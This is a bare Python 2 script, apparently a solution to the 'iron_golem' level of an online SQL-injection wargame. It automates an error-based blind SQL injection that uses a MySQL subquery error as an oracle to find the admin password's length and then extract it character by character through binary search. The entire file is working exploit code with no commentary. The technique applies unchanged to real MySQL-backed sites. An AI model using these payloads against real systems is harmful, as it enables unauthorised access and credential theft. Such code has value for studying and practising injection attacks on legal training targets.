1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
|
import requests
def testEqual(j, num):
try:
query = url + "1' or id='admin' and if(ord(substr(pw, " + str(j) + ", 1)) = " + str(num) + ", (select 1 union select 2), 2)%23"
r = requests.post(query, cookies=session)
except:
print "[-] Error occur"
if 'Subquery returns more than 1 row' in r.text:
return True
else:
return False
def testBigger(j, num):
try:
query = url + "1' or id='admin' and if(ord(substr(pw, " + str(j) + ", 1)) < " + str(num) + ", (select 1 union select 2), 2)%23"
r = requests.post(query, cookies=session)
except:
print "[-] Error occur"
if 'Subquery returns more than 1 row' in r.text:
return True
else:
return False
def searchPw(j, start, end):
if start > end:
return "None"
mid = (start + end) / 2
if testEqual(j, mid):
return mid
elif testBigger(j, mid):
end = mid - 1
else:
start = mid + 1
return searchPw(j, start, end)
flag = ""
length = 0
url = "http://los.rubiya.kr/iron_golem_beb244fe41dd33998ef7bb4211c56c75.php?pw="
session = dict(PHPSESSID = "YOUR SESSION ID")
print "[+] Start"
print "[+] Find length of the password"
for i in range(0, 100):
try:
query = url + "1' or id='admin' and if(length(pw)=" + str(i) + ", (select 1 union select 2), 2)%23"
r = requests.post(query, cookies=session)
except:
print "[-] Error occur"
continue
if 'Subquery returns more than 1 row' in r.text:
length = i
break
print "[+] Found length : ", length
print "[+] Find password"
for j in range(1, length + 1):
flag += str(searchPw(j, 0, 65535)) + " "
print "[+] Found ", str(j), "'s pw : ", flag
print "[+] Found password : ", flag
print "[+] End"
|